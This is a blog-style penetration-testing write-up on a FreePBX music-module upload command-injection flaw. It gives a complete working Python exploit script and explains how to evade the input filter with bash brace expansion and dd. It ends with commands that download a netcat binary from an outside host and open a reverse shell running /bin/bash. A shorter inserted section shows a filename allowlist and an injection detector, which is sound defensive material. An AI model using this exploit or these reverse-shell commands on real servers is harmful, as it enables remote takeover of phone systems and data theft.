FreePBX Exploit and Brace Expansion

During an engagement, I stumbled upon a box running a vulnerable version of FreePBX software. I tried a couple of exploits, but unfortunately, they did not work. The only exploit which worked is this. It is just a curl command, and it is not very comfortable to edit the curl command every time.

So I wrote a simple Python script in order to run commands on the box:

import requests
from sys import argv, exit

def main():
    if len(argv) != 3:
        print('usage: python freepbx.py <server> <command>')
        exit(1)

    base = 'http://' + argv[1]
    # Vulnerable endpoint: the music module's upload handler
    url = base + '/admin/ajax.php?module=music&command=upload'
    cmd = argv[2]

    # The uploaded file name ends up in a shell command line on the server,
    # so a command substitution in the name gets executed there.
    multipart_form_data = {
        'extension': (None, '0'),
        'language': (None, 'en'),
        'filename': (None, 'fa.wav'),
        'codec[1]': (None, 'gsm'),
        'id': (None, '1'),
        'files[1]': ('$(' + cmd + ').wav', 'exploit by @simonuvarov')
    }

    # The endpoint expects a same-origin Referer
    headers = {
        'Referer': base + '/admin/ajax.php'
    }

    response = requests.post(url, files=multipart_form_data, headers=headers)

    # response.text is a str, so the escaped newlines are replaced as str, not bytes
    print(response.text.replace('\\n', '\n'))

if __name__ == '__main__':
    main()

Usage is simple: python freepbx.py <server> <command>. Sorry, no man pages this time.

The developers attempted to prevent shell command injection by performing a simple, yet inadequate, sanitization. Special characters are filtered, and thus I was not able to run nc -nv <ip> <port> or echo aaa > file.txt. I was forced to use only one-word commands.

How can I compromise a box if I'm not allowed to use spaces? Easy: I can run commands without spaces at all by using the {ls,-l} syntax, which is called brace expansion. Bash expands {ls,-l} into the two words ls -l before the command is executed, so the space never has to appear in the input.
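The root cause above is a blocklist that "cleans" a filename instead of rejecting it, which leaves command substitution and brace expansion intact. The following is an added example (not FreePBX's code or the author's script) showing the hardened form, an allowlist that rejects anything but a plain sound-file name, plus a detector for the same patterns in constructed upload log lines; the log format is an assumption.

```python
import re

# Hardened input check: accept only a short basename of safe characters and
# one extension from a fixed set. Names that fail are rejected outright,
# never "cleaned", so no shell metacharacter can reach a command line.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(wav|gsm|ulaw|alaw|mp3)$")

def is_safe_filename(name: str) -> bool:
    return SAFE_NAME.fullmatch(name) is not None

# Detection side: tokens that indicate command substitution ($( or backtick)
# or a brace-expansion word list ({a,b}) inside a user-supplied filename.
SUSPICIOUS = re.compile(r"\$\(|`|\{[^{}]*,[^{}]*\}")

def looks_like_shell_injection(name: str) -> bool:
    return SUSPICIOUS.search(name) is not None

# Constructed sample upload records in an assumed format:
# "<client> <request path> filename=<uploaded name>"
SAMPLE_LOG = """\
10.0.0.5 /admin/ajax.php?module=music&command=upload filename=hold-music.wav
10.0.0.9 /admin/ajax.php?module=music&command=upload filename=$({ls,-l}).wav
10.0.0.9 /admin/ajax.php?module=music&command=upload filename=$({cat,dot}).wav
"""

def flag_upload_lines(log: str):
    """Return (client, filename) for every upload whose name looks like injection."""
    hits = []
    for line in log.splitlines():
        m = re.match(r"(\S+) \S+ filename=(.*)$", line)
        if m and looks_like_shell_injection(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits
```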

Interesting things don't stop here. I wanted to write files, and I was not able to use / or \. The workaround is simple too - use the command echo "Hello world" | dd of=test.txt, where of stands for "output file".

Ok. Then I wanted to get a reverse shell, but I still couldn't use dots and slashes. However, I could run commands, write files, and there's command substitution in Linux, of course. So I ran:

python freepbx.py <server> "ls|{head,-n,1}|{cut,-c,5}|{dd,of=dot}"

Doing so, I wrote a dot character into a file, taken from the ls output (it was the 5th character of the first file name in my case).

I did the same for the slash character, but this time I pulled it from the pwd command output:

python freepbx.py <server> "{pwd,}|{cut,-c,1}|{dd,of=slash}"

Now I was able to get a reverse shell:

python freepbx.py <server> "{wget,exgq\$({cat,dot})pw\$({cat,slash})nc}"
python freepbx.py <server> "{chmod,+x,nc}"
python freepbx.py <server> "{\$({cat,dot})\$({cat,slash})nc,exgq\$({cat,dot})pw,4444,-e,\$({cat,slash})bin\$({cat,slash})bash}"